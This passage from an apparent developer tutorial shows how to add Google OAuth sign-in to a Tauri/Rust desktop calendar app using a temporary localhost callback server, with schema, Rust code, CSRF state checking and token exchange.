<strong>Limited scope support</strong>: Some Google APIs don't support Device Flow </li> <li> <strong>Poor UX</strong>: Copy-pasting codes feels clunky for a desktop app</li> </ol> <p>After hitting walls with <code>invalid_client</code> errors for hours, I realized this wasn't the right approach for a desktop app with full keyboard/browser access.</p> <h3> Attempt 2: Localhost Redirect (Success!) </h3> <p>Then I discovered what VS Code, Spotify, Slack, and virtually every other desktop app does: <strong>spin up a temporary HTTP server on localhost</strong>.</p> <p>The flow:</p> <ol> <li>Open user's browser → Google OAuth page</li> <li>User authorizes</li> <li>Google redirects to <code>http://localhost:3333/oauth/callback?code=...</code> </li> <li>Your tiny HTTP server catches it</li> <li>Exchange code for tokens</li> <li>Show success page</li> <li>Shut down server</li> </ol> <p>This is actually the <strong>standard OAuth 2.0 Authorization Code flow</strong>, adapted for desktop apps.</p> <p><strong>Why it works:</strong></p> <ul> <li>Google's "Desktop app" credentials automatically accept any localhost redirect</li> <li>No need to pre-configure ports or URLs</li> <li>Instant response (no polling)</li> <li>Familiar user experience</li> <li>Supports all Google API scopes</li> </ul> <p>I found <a href="https://codevoweb.com/how-to-implement-google-oauth2-in-rust/" rel="noopener noreferrer">this excellent Rust OAuth guide</a> that confirmed this is the right path. Let's build it.</p> <h2> The Complete Implementation </h2> <h3> Project Structure </h3> <p>First, let's look at how everything is organized:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>src-tauri/ ├── src/ │ ├── commands/ │ │ └── calendar_commands.rs # Tauri commands (Frontend ↔ Rust) │ ├── services/ │ │ └── calendar_service.rs # Business logic layer │ ├── thirdparty/ │ │ └── calendar/ │ │ └── google_oauth.rs # Google API integration │ ├── structs/ │ │ └── calendar/ │ │ └── calendar_credentials.rs # Data structures │ ├── db/ │ │ ├── mod.rs # Database operations │ │ ├── tables/ │ │ │ └── calendar_credentials.sql │ │ └── sql/ │ │ ├── save_calendar_credentials.sql │ │ └── get_calendar_credentials.sql │ └── oauth_pages/ │ ├── success.html # OAuth success page │ ├── error.html # OAuth error page │ └── security_error.html # CSRF attack warning </code></pre> </div> <p>This layered approach keeps concerns separated:</p> <ul> <li> <strong>Commands</strong>: Thin layer exposing Rust functions to JavaScript</li> <li> <strong>Services</strong>: Orchestrates business logic and database operations</li> <li> <strong>Thirdparty</strong>: Talks to external APIs (Google)</li> <li> <strong>Database</strong>: All SQL isolated in separate files</li> <li> <strong>Structs</strong>: Shared data types</li> </ul> <h3> Step 1: Data Structures </h3> <p>Start with the core data type for storing OAuth credentials:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="c1">// src/structs/calendar/calendar_credentials.rs</span> <span class="k">use</span> <span class="nn">chrono</span><span class="p">::{</span><span class="n">DateTime</span><span class="p">,</span> <span class="n">Utc</span><span class="p">};</span> <span class="k">use</span> <span class="nn">serde</span><span class="p">::{</span><span class="n">Deserialize</span><span class="p">,</span> <span class="n">Serialize</span><span class="p">};</span> <span class="nd">#[derive(Debug,</span> <span class="nd">Serialize,</span> <span class="nd">Deserialize,</span> <span class="nd">Clone)]</span> <span class="k">pub</span> <span class="k">struct</span> <span class="n">CalendarCredentials</span> <span class="p">{</span> <span class="k">pub</span> <span class="n">email</span><span class="p">:</span> <span class="nb">String</span><span class="p">,</span> <span class="k">pub</span> <span class="n">access_token</span><span class="p">:</span> <span class="nb">String</span><span class="p">,</span> <span class="k">pub</span> <span class="n">refresh_token</span><span class="p">:</span> <span class="nb">String</span><span class="p">,</span> <span class="k">pub</span> <span class="n">token_expiry</span><span class="p">:</span> <span class="n">DateTime</span><span class="o">&lt;</span><span class="n">Utc</span><span class="o">&gt;</span><span class="p">,</span> <span class="p">}</span> </code></pre> </div> <p><strong>Why this structure?</strong></p> <ul> <li> <code>email</code>: Shows user which account is connected</li> <li> <code>access_token</code>: Short-lived (1 hour), used for API calls</li> <li> <code>refresh_token</code>: Long-lived, gets new access tokens</li> <li> <code>token_expiry</code>: When to refresh the access token</li> <li> <code>DateTime&lt;Utc&gt;</code>: Timezone-aware timestamps prevent bugs</li> </ul> <h3> Step 2: Database Schema </h3> <p>Single-user table with a clever constraint:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="c1">-- src/db/tables/calendar_credentials.sql</span> <span class="k">CREATE</span> <span class="k">TABLE</span> <span class="n">IF</span> <span class="k">NOT</span> <span class="k">EXISTS</span> <span class="n">calendar_credentials</span> <span class="p">(</span> <span class="n">id</span> <span class="nb">INTEGER</span> <span class="k">PRIMARY</span> <span class="k">KEY</span> <span class="k">CHECK</span> <span class="p">(</span><span class="n">id</span> <span class="o">=</span> <span class="mi">1</span><span class="p">),</span> <span class="c1">-- Only allows ONE row</span> <span class="n">email</span> <span class="nb">VARCHAR</span><span class="p">(</span><span class="mi">255</span><span class="p">)</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="n">access_token</span> <span class="nb">TEXT</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="n">refresh_token</span> <span class="nb">TEXT</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="n">token_expiry</span> <span class="nb">DATETIME</span> <span class="k">NOT</span> <span class="k">NULL</span><span class="p">,</span> <span class="n">created_at</span> <span class="nb">DATETIME</span> <span class="k">NOT</span> <span class="k">NULL</span> <span class="k">DEFAULT</span> <span class="k">CURRENT_TIMESTAMP</span><span class="p">,</span> <span class="n">updated_at</span> <span class="nb">DATETIME</span> <span class="k">NOT</span> <span class="k">NULL</span> <span class="k">DEFAULT</span> <span class="k">CURRENT_TIMESTAMP</span> <span class="p">);</span> <span class="c1">-- Initialize with empty placeholder</span> <span class="k">INSERT</span> <span class="k">OR</span> <span class="k">IGNORE</span> <span class="k">INTO</span> <span class="n">calendar_credentials</span> <span class="p">(</span><span class="n">id</span><span class="p">,</span> <span class="n">email</span><span class="p">,</span> <span class="n">access_token</span><span class="p">,</span> <span class="n">refresh_token</span><span class="p">,</span> <span class="n">token_expiry</span><span class="p">)</span> <span class="k">VALUES</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s1">''</span><span class="p">,</span> <span class="s1">''</span><span class="p">,</span> <span class="s1">''</span><span class="p">,</span> <span class="k">CURRENT_TIMESTAMP</span><span class="p">);</span> </code></pre> </div> <p><strong>The <code>CHECK (id = 1)</code> trick</strong> ensures only one row can exist. This is a single-user desktop app, so we don't need multiple accounts (yet). Trying to insert <code>id = 2</code> will fail.</p> <p>Save credentials:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="c1">-- src/db/sql/save_calendar_credentials.sql</span> <span class="k">UPDATE</span> <span class="n">calendar_credentials</span> <span class="k">SET</span> <span class="n">email</span> <span class="o">=</span> <span class="o">?</span><span class="p">,</span> <span class="n">access_token</span> <span class="o">=</span> <span class="o">?</span><span class="p">,</span> <span class="n">refresh_token</span> <span class="o">=</span> <span class="o">?</span><span class="p">,</span> <span class="n">token_expiry</span> <span class="o">=</span> <span class="o">?</span><span class="p">,</span> <span class="n">updated_at</span> <span class="o">=</span> <span class="k">CURRENT_TIMESTAMP</span> <span class="k">WHERE</span> <span class="n">id</span> <span class="o">=</span> <span class="mi">1</span> </code></pre> </div> <p>Get credentials:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="c1">-- src/db/sql/get_calendar_credentials.sql</span> <span class="k">SELECT</span> <span class="n">email</span><span class="p">,</span> <span class="n">access_token</span><span class="p">,</span> <span class="n">refresh_token</span><span class="p">,</span> <span class="n">token_expiry</span> <span class="k">FROM</span> <span class="n">calendar_credentials</span> <span class="k">WHERE</span> <span class="n">id</span> <span class="o">=</span> <span class="mi">1</span> <span class="k">AND</span> <span class="n">email</span> <span class="o">!=</span> <span class="s1">''</span> </code></pre> </div> <p>The <code>email != ''</code> check returns <code>NULL</code> if never authenticated.</p> <h3> Step 3: The OAuth Flow (The Heart of It All) </h3> <p>Here's the complete OAuth implementation:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="c1">// src/thirdparty/calendar/google_oauth.rs</span> <span class="k">use</span> <span class="k">crate</span><span class="p">::</span><span class="nn">structs</span><span class="p">::</span><span class="nn">calendar</span><span class="p">::</span><span class="n">CalendarCredentials</span><span class="p">;</span> <span class="k">use</span> <span class="nn">chrono</span><span class="p">::{</span><span class="n">Duration</span><span class="p">,</span> <span class="n">Utc</span><span class="p">};</span> <span class="k">use</span> <span class="nn">reqwest</span><span class="p">::</span><span class="n">Client</span><span class="p">;</span> <span class="k">use</span> <span class="nn">serde</span><span class="p">::</span><span class="n">Deserialize</span><span class="p">;</span> <span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">sync</span><span class="p">::{</span><span class="nb">Arc</span><span class="p">,</span> <span class="n">Mutex</span><span class="p">};</span> <span class="k">use</span> <span class="nn">tiny_http</span><span class="p">::{</span><span class="n">Server</span><span class="p">,</span> <span class="n">Response</span><span class="p">};</span> <span class="c1">// OAuth Configuration</span> <span class="k">const</span> <span class="n">CLIENT_ID</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span> <span class="o">=</span> <span class="s">"your-client-id.apps.googleusercontent.com"</span><span class="p">;</span> <span class="k">const</span> <span class="n">CLIENT_SECRET</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span> <span class="o">=</span> <span class="s">"your-client-secret"</span><span class="p">;</span> <span class="k">const</span> <span class="n">REDIRECT_URI</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span> <span class="o">=</span> <span class="s">"http://localhost:3333/oauth/callback"</span><span class="p">;</span> <span class="k">const</span> <span class="n">GOOGLE_AUTH_URL</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span> <span class="o">=</span> <span class="s">"https://accounts.google.com/o/oauth2/v2/auth"</span><span class="p">;</span> <span class="k">const</span> <span class="n">GOOGLE_TOKEN_URL</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span> <span class="o">=</span> <span class="s">"https://oauth2.googleapis.com/token"</span><span class="p">;</span> <span class="k">const</span> <span class="n">SCOPES</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span> <span class="o">=</span> <span class="s">"https://www.googleapis.com/auth/calendar.events https://www.googleapis.com/auth/userinfo.email"</span><span class="p">;</span> <span class="c1">// Load HTML templates at compile time (zero runtime cost!)</span> <span class="k">const</span> <span class="n">SUCCESS_HTML</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span> <span class="o">=</span> <span class="nd">include_str!</span><span class="p">(</span><span class="s">"../../oauth_pages/success.html"</span><span class="p">);</span> <span class="k">const</span> <span class="n">ERROR_HTML</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span> <span class="o">=</span> <span class="nd">include_str!</span><span class="p">(</span><span class="s">"../../oauth_pages/error.html"</span><span class="p">);</span> <span class="k">const</span> <span class="n">SECURITY_ERROR_HTML</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span> <span class="o">=</span> <span class="nd">include_str!</span><span class="p">(</span><span class="s">"../../oauth_pages/security_error.html"</span><span class="p">);</span> <span class="c1">// Response structures for deserializing Google's JSON</span> <span class="nd">#[derive(Debug,</span> <span class="nd">Deserialize)]</span> <span class="k">struct</span> <span class="n">TokenResponse</span> <span class="p">{</span> <span class="n">access_token</span><span class="p">:</span> <span class="nb">String</span><span class="p">,</span> <span class="n">refresh_token</span><span class="p">:</span> <span class="nb">Option</span><span class="o">&lt;</span><span class="nb">String</span><span class="o">&gt;</span><span class="p">,</span> <span class="n">expires_in</span><span class="p">:</span> <span class="nb">i64</span><span class="p">,</span> <span class="nd">#[allow(dead_code)]</span> <span class="n">token_type</span><span class="p">:</span> <span class="nb">String</span><span class="p">,</span> <span class="p">}</span> <span class="nd">#[derive(Deserialize)]</span> <span class="k">struct</span> <span class="n">UserInfo</span> <span class="p">{</span> <span class="n">email</span><span class="p">:</span> <span class="nb">String</span><span class="p">,</span> <span class="p">}</span> <span class="c1">// Generate random state for CSRF protection</span> <span class="k">fn</span> <span class="nf">generate_state</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">String</span> <span class="p">{</span> <span class="k">use</span> <span class="nn">rand</span><span class="p">::</span><span class="n">Rng</span><span class="p">;</span> <span class="nn">rand</span><span class="p">::</span><span class="nf">thread_rng</span><span class="p">()</span> <span class="nf">.sample_iter</span><span class="p">(</span><span class="o">&amp;</span><span class="nn">rand</span><span class="p">::</span><span class="nn">distributions</span><span class="p">::</span><span class="n">Alphanumeric</span><span class="p">)</span> <span class="nf">.take</span><span class="p">(</span><span class="mi">32</span><span class="p">)</span> <span class="nf">.map</span><span class="p">(</span><span class="nn">char</span><span class="p">::</span><span class="n">from</span><span class="p">)</span> <span class="nf">.collect</span><span class="p">()</span> <span class="p">}</span> <span class="k">pub</span> <span class="k">async</span> <span class="k">fn</span> <span class="nf">start_oauth_flow</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="n">CalendarCredentials</span><span class="p">,</span> <span class="nb">String</span><span class="o">&gt;</span> <span class="p">{</span> <span class="c1">// Step 1: Generate CSRF protection token</span> <span class="k">let</span> <span class="n">state</span> <span class="o">=</span> <span class="nf">generate_state</span><span class="p">();</span> <span class="c1">// Step 2: Build authorization URL</span> <span class="k">let</span> <span class="n">auth_url</span> <span class="o">=</span> <span class="nd">format!</span><span class="p">(</span> <span class="s">"{}?client_id={}&amp;redirect_uri={}&amp;response_type=code&amp;scope={}&amp;state={}&amp;access_type=offline&amp;prompt=consent"</span><span class="p">,</span> <span class="n">GOOGLE_AUTH_URL</span><span class="p">,</span> <span class="nn">urlencoding</span><span class="p">::</span><span class="nf">encode</span><span class="p">(</span><span class="n">CLIENT_ID</span><span class="p">),</span> <span class="nn">urlencoding</span><span class="p">::</span><span class="nf">encode</span><span class="p">(</span><span class="n">REDIRECT_URI</span><span class="p">),</span> <span class="nn">urlencoding</span><span class="p">::</span><span class="nf">encode</span><span class="p">(</span><span class="n">SCOPES</span><span class="p">),</span> <span class="n">state</span> <span class="p">);</span> <span class="c1">// Step 3: Open browser to Google's OAuth page</span> <span class="nn">webbrowser</span><span class="p">::</span><span class="nf">open</span><span class="p">(</span><span class="o">&amp;</span><span class="n">auth_url</span><span class="p">)</span> <span class="nf">.map_err</span><span class="p">(|</span><span class="n">e</span><span class="p">|</span> <span class="nd">format!</span><span class="p">(</span><span class="s">"Failed to open browser: {}"</span><span class="p">,</span> <span class="n">e</span><span class="p">))</span><span class="o">?</span><span class="p">;</span> <span class="c1">// Step 4: Start tiny HTTP server for callback</span> <span class="k">let</span> <span class="n">server</span> <span class="o">=</span> <span class="nn">Server</span><span class="p">::</span><span class="nf">http</span><span class="p">(</span><span class="s">"127.0.0.1:3333"</span><span class="p">)</span> <span class="nf">.map_err</span><span class="p">(|</span><span class="n">e</span><span class="p">|</span> <span class="nd">format!</span><span class="p">(</span><span class="s">"Failed to start server: {}"</span><span class="p">,</span> <span class="n">e</span><span class="p">))</span><span class="o">?</span><span class="p">;</span> <span class="c1">// Shared state for the authorization code</span> <span class="k">let</span> <span class="n">code_result</span> <span class="o">=</span> <span class="nn">Arc</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nn">Mutex</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nn">None</span><span class="p">::</span><span class="o">&lt;</span><span class="nb">String</span><span class="o">&gt;</span><span class="p">));</span> <span class="k">let</span> <span class="n">code_clone</span> <span class="o">=</span> <span class="n">code_result</span><span class="nf">.clone</span><span class="p">();</span> <span class="c1">// Step 5: Wait for callback (with 5-minute timeout)</span> <span class="k">let</span> <span class="n">timeout</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">time</span><span class="p">::</span><span class="nn">Duration</span><span class="p">::</span><span class="nf">from_secs</span><span class="p">(</span><span class="mi">300</span><span class="p">);</span> <span class="k">let</span> <span class="n">start</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">time</span><span class="p">::</span><span class="nn">Instant</span><span class="p">::</span><span class="nf">now</span><span class="p">();</span> <span class="k">for</span> <span class="n">request</span> <span class="k">in</span> <span class="n">server</span><span class="nf">.incoming_requests</span><span class="p">()</span> <span class="p">{</span> <span class="k">if</span> <span class="n">start</span><span class="nf">.elapsed</span><span class="p">()</span> <span class="o">&gt;</span> <span class="n">timeout</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="s">"Authorization timeout after 5 minutes"</span><span class="nf">.to_string</span><span class="p">());</span> <span class="p">}</span> <span class="k">let</span> <span class="n">url</span> <span class="o">=</span> <span class="n">request</span><span class="nf">.url</span><span class="p">()</span><span class="nf">.to_string</span><span class="p">();</span> <span class="c1">// Only handle our callback path</span> <span class="k">if</span> <span class="o">!</span><span class="n">url</span><span class="nf">.starts_with</span><span class="p">(</span><span class="s">"/oauth/callback"</span><span class="p">)</span> <span class="p">{</span> <span class="k">let</span> <span class="n">_</span> <span class="o">=</span> <span class="n">request</span><span class="nf">.respond</span><span class="p">(</span><span class="nn">Response</span><span class="p">::</span><span class="nf">from_string</span><span class="p">(</span><span class="s">"Not found"</span><span class="p">)</span><span class="nf">.with_status_code</span><span class="p">(</span><span class="mi">404</span><span class="p">));</span> <span class="k">continue</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// Step 6: Parse query parameters</span> <span class="k">if</span> <span class="k">let</span> <span class="nf">Some</span><span class="p">(</span><span class="n">query</span><span class="p">)</span> <span class="o">=</span> <span class="n">url</span><span class="nf">.split</span><span class="p">(</span><span class="sc">'?'</span><span class="p">)</span><span class="nf">.nth</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">code</span> <span class="o">=</span> <span class="nb">None</span><span class="p">;</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">received_state</span> <span class="o">=</span> <span class="nb">None</span><span class="p">;</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">error</span> <span class="o">=</span> <span class="nb">None</span><span class="p">;</span> <span class="k">for</span> <span class="n">param</span> <span class="k">in</span> <span class="n">query</span><span class="nf">.split</span><span class="p">(</span><span class="sc">'&amp;'</span><span class="p">)</span> <span class="p">{</span> <span class="k">let</span> <span class="n">parts</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;&amp;</span><span class="nb">str</span><span class="o">&gt;</span> <span class="o">=</span> <span class="n">param</span><span class="nf">.split</span><span class="p">(</span><span class="sc">'='</span><span class="p">)</span><span class="nf">.collect</span><span class="p">();</span> <span class="k">if</span> <span class="n">parts</span><span class="nf">.len</span><span class="p">()</span> <span class="o">==</span> <span class="mi">2</span> <span class="p">{</span> <span class="k">match</span> <span class="n">parts</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="p">{</span> <span class="s">"code"</span> <span class="k">=&gt;</span> <span class="n">code</span> <span class="o">=</span> <span class="nf">Some</span><span class="p">(</span><span class="nn">urlencoding</span><span class="p">::</span><span class="nf">decode</span><span class="p">(</span><span class="n">parts</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span><span class="nf">.unwrap_or_default</span><span class="p">()</span><span class="nf">.to_string</span><span class="p">()),</span> <span class="s">"state"</span> <span class="k">=&gt;</span> <span class="n">received_state</span> <span class="o">=</span> <span class="nf">Some</span><span class="p">(</span><span class="n">parts</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="nf">.to_string</span><span class="p">()),</span> <span class="s">"error"</span> <span class="k">=&gt;</span> <span class="n">error</span> <span class="o">=</span> <span class="nf">Some</span><span class="p">(</span><span class="n">parts</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="nf">.to_string</span><span class="p">()),</span> <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">{}</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="c1">// Step 7: Handle errors from Google</span> <span class="k">if</span> <span class="k">let</span> <span class="nf">Some</span><span class="p">(</span><span class="n">err</span><span class="p">)</span> <span class="o">=</span> <span class="n">error</span> <span class="p">{</span> <span class="k">let</span> <span class="n">html</span> <span class="o">=</span> <span class="n">ERROR_HTML</span><span class="nf">.replace</span><span class="p">(</span><span class="s">"{{ERROR_MESSAGE}}"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">err</span><span class="p">);</span> <span class="k">let</span> <span class="n">response</span> <span class="o">=</span> <span class="nn">Response</span><span class="p">::</span><span class="nf">from_string</span><span class="p">(</span><span class="n">html</span><span class="p">)</span> <span class="nf">.with_header</span><span class="p">(</span><span class="nn">tiny_http</span><span class="p">::</span><span class="nn">Header</span><span class="p">::</span><span class="nf">from_bytes</span><span class="p">(</span><span class="o">&amp;</span><span class="s">b"Content-Type"</span><span class="p">[</span><span class="o">..</span><span class="p">],</span> <span class="o">&amp;</span><span class="s">b"text/html"</span><span class="p">[</span><span class="o">..</span><span class="p">])</span><span class="nf">.unwrap</span><span class="p">());</span> <span class="k">let</span> <span class="n">_</span> <span class="o">=</span> <span class="n">request</span><span class="nf">.respond</span><span class="p">(</span><span class="n">response</span><span class="p">);</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nd">format!</span><span class="p">(</span><span class="s">"Authorization error: {}"</span><span class="p">,</span> <span class="n">err</span><span class="p">));</span> <span class="p">}</span> <span class="c1">// Step 8: VERIFY STATE (Critical security check!)</span> <span class="k">if</span> <span class="n">received_state</span><span class="nf">.as_deref</span><span class="p">()</span> <span class="o">!=</span> <span class="nf">Some</span><span class="p">(</span><span class="o">&amp;</span><span class="n">state</span><span class="p">)</span> <span class="p">{</span> <span class="k">let</span> <span class="n">response</span> <span class="o">=</span> <span class="nn">Response</span><span class="p">::</span><span class="nf">from_string</span><span class="p">(</span><span class="n">SECURITY_ERROR_HTML</span><span class="p">)</span> <span class="nf">.with_header</span><span class="p">(</span><span class="nn">tiny_http</span><span class="p">::</span><span class="nn">Header</span><span class="p">::</span><span class="nf">from_bytes</span><span class="p">(</span><span class="o">&amp;</span><span class="s">b"Content-Type"</span><span class="p">[</span><span class="o">..</span><span class="p">],</span> <span class="o">&amp;</span><span class="s">b"text/html"</span><span class="p">[</span><span class="o">..</span><span class="p">])</span><span class="nf">.unwrap</span><span class="p">());</span> <span class="k">let</span> <span class="n">_</span> <span class="o">=</span> <span class="n">request</span><span class="nf">.respond</span><span class="p">(</span><span class="n">response</span><span class="p">);</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="s">"Invalid state - possible CSRF attack"</span><span class="nf">.to_string</span><span class="p">());</span> <span class="p">}</span> <span class="c1">// Step 9: Success! Send pretty page to browser</span> <span class="k">if</span> <span class="k">let</span> <span class="nf">Some</span><span class="p">(</span><span class="n">auth_code</span><span class="p">)</span> <span class="o">=</span> <span class="n">code</span> <span class="p">{</span> <span class="k">let</span> <span class="n">response</span> <span class="o">=</span> <span class="nn">Response</span><span class="p">::</span><span class="nf">from_string</span><span class="p">(</span><span class="n">SUCCESS_HTML</span><span class="p">)</span> <span class="nf">.with_header</span><span class="p">(</span><span class="nn">tiny_http</span><span class="p">::</span><span class="nn">Header</span><span class="p">::</span><span class="nf">from_bytes</span><span class="p">(</span><span class="o">&amp;</span><span class="s">b"Content-Type"</span><span class="p">[</span><span class="o">..</span><span class="p">],</span> <span class="o">&amp;</span><span class="s">b"text/html"</span><span class="p">[</span><span class="o">..</span><span class="p">])</span><span class="nf">.unwrap</span><span class="p">());</span> <span class="k">let</span> <span class="n">_</span> <span class="o">=</span> <span class="n">request</span><span class="nf">.respond</span><span class="p">(</span><span class="n">response</span><span class="p">);</span> <span class="o">*</span><span class="n">code_clone</span><span class="nf">.lock</span><span class="p">()</span><span class="nf">.unwrap</span><span class="p">()</span> <span class="o">=</span> <span class="nf">Some</span><span class="p">(</span><span class="n">auth_code</span><span class="p">);</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="c1">// Step 10: Extract the authorization code</span> <span class="k">let</span> <span class="n">auth_code</span> <span class="o">=</span> <span class="n">code_result</span><span class="nf">.lock</span><span class="p">()</span><span class="nf">.unwrap</span><span class="p">()</span><span class="nf">.take</span><span class="p">()</span> <span class="nf">.ok_or_else</span><span class="p">(||</span> <span class="s">"No authorization code received"</span><span class="nf">.to_string</span><span class="p">())</span><span class="o">?</span><span class="p">;</span> <span class="c1">// Step 11: Exchange code for tokens</span> <span class="nf">exchange_code_for_tokens</span><span class="p">(</span><span class="o">&amp;</span><span class="n">auth_code</span><span class="p">)</span><span class="k">.await</span> <span class="p">}</span> </code></pre> </div> <p><strong>Why port 3333?</strong><br><br> Ports 8080/5173 are often taken by dev servers. Port 3333 is uncommon enough to usually be free. Google's "Desktop app" credentials accept <strong>any</strong> localhost port automatically - no configuration needed.</p> <p><strong>The CSRF state parameter:</strong><br><br> This prevents attackers from tricking users into authorizing malicious apps. The flow:</p> <ol> <li>App generates random 32-char string</li> <li>Includes it in authorization URL</li> <li>Google includes it in callback</li> <li>App verifies they match</li> <li>If mismatch → Attack attempt detected!</li> </ol> <p><strong>The CSRF state parameter:</strong><br><br> This prevents attackers from tricking users into authorizing malicious apps. The flow:</p> <ol> <li>App generates random 32-char string</li> <li>Includes it in authorization URL</li> <li>Google includes it in callback</li> <li>App verifies they match</li> <li>If mismatch → Attack attempt detected!</li> </ol> <h3> Step 4: Token Exchange </h3> <p>After getting the authorization code, exchange it for actual tokens:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight rust"><code><span class="k">async</span> <span class="k">fn</span> <span class="nf">exchange_code_for_tokens</span><span class="p">(</span><span class="n">code</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="n">CalendarCredentials</span><span class="p">,</span> <span class="nb">String</span><span class="o">&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">client</span> <span class="o">=</span> <span class="nn">Client</span><span class="p">::</span><span class="nf">builder</span><span class="p">()</span> <span class="nf">.timeout</span><span class="p">(</span><span class="nn">std</span><span class="p">::</span><span class="nn">time</span><span class="p">::</span><span class="nn">Duration</span><span class="p">::</span><span class="nf">from_secs</span><span class="p">(</span><span class="mi">30</span><span class="p">))</span> <span class="nf">.build</span><span class="p">()</span> <span class="nf">.map_err</span><span class="p">(|</span><span class="n">e</span><span class="p">|</span> <span class="nd">format!</span><span class="p">(</span><span class="s">"Failed to build HTTP client: {}"</span><span class="p">,</span> <span class="n">e</span><span class="p">))</span><span class="o">?</span><span class="p">;</span> <span class="k">let</span> <span class="n">params</span> <span class="o">=</span> <span class="p">[</span> <span class="p">(</span><span class="s">"client_id"</span><span class="p">,</span> <span class="n">CLIENT_ID</span><span class="p">),</span> <span class="p">(</span><span class="s">"client_secret"</span><span class="p">,</span> <span class="n">CLIENT_SECRET</span><span class="p">),</span> <span class="p">(</span><span class="s">"code"</span><span class="p">,</span> <span class="n">code</span><span class="p">),</span> <span class="p">(</span><span class="s">"grant_type"</span><span class="p">,</span> <span class="s">"authorization_code"</span><span class="p">),</span> <span class="p">(</span><span class="s">"redirect_uri"</span><span class="p">,</span> <span class="n">REDIRECT_URI</span><span class="p">),</span> <span class="p">];</span> <span class="k">let</span> <span class="n">response</span> <span class="o">=</span> <span class="n">client</span> <span class="nf">.post</span><span class="p">(</span><span class="n">GOOGLE_TOKEN_URL</span><span class="p">)</span> <span class="nf">.form</span><span class="p">(</span><span class="o">&amp;</span><span class="n">params</span><span class="p">)</span> <span class="nf">.send</span><span class="p">()</span> <span class="k">.await</span> <span class="nf">.map_err</span><span class="p">(|</span><span class="n">e</span><span class="p">|</span> <span class="nd">format!</span><span class="p">(</span><span class="s">"Failed to exchange code for tokens: {}"</span><span class="p">,</span> <span class="n">e</span><span class="p">))</span><span class="o">?</span><span class="p">;</span> <span class="k">if</span> <span class="o">!</span><span class="n">response</span><span class="nf">.status</span><span class="p">()</span><span class="nf">.is_success</span><span class="p">()</span> <span class="p">{</span> <span class="k">let</span> <span class="n">status</span> <span class="o">=</span> <span class="n">response</span><span class="nf">.status</span><span class="p">();</span> <span class="k">let</span> <span class="n">error_body</span> <span class="o">=</span> <span class="n">response</span><span class="nf">.text</span><span class="p">()</span><span class="k">.await</span><span class="nf">.unwrap_or_default</span><span class="p">();</span> <span class="nd">eprintln!</span><span class="p">(</span><span class="s">"Token exchange failed: {} - {}"</span><span class="p">,</span> <span class="n">status</span><span class="p">,</span> <span class="n">error_body</span><span class="p">);</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nd">format!</span><span class="p">(</span><span class="s">"Token exchange failed: {}"</span><span class="p">,</span> <span class="n">status</span><span class="p">));</span> <span class="p">}</span> <span class="k">let</span> <span class="n">token_data</span><span class="p">:</span> <span class="n">TokenResponse</span> <span class="o">=</span> <span class="n">response</span> <span class="nf">.json</span><span class="p">()</span> <span class="k">.await</span> <span class="nf">.map_err</span><span class="p">(|</span><span class="n">e</span><span class="p">|</span> <span class="nd">format!</span><span class="p">(</span><span class="s">"Failed to parse token response: {}"</span><span class="p">,</span> <span class="n">e</span><span class="p">))</span><span class="o">?</span><span class="p">;</span> <span class="k">let</span> <span class="n">refresh_token</span> <span class="o">=</span> <span class="n">token_data</span><span class="py">.refresh_token</span> <span class="nf">.ok_or_else</span><span class="p">(||</span> <span class="s">"No refresh token received. Try revoking app access and reconnecting."</span><span class="nf">.to_string</span><span class="p">())</span><span class="o">?</span><span class="p">;</span> <span class="k">let</span> <span class="n">token_expiry</span> <span class="o">=</span> <span 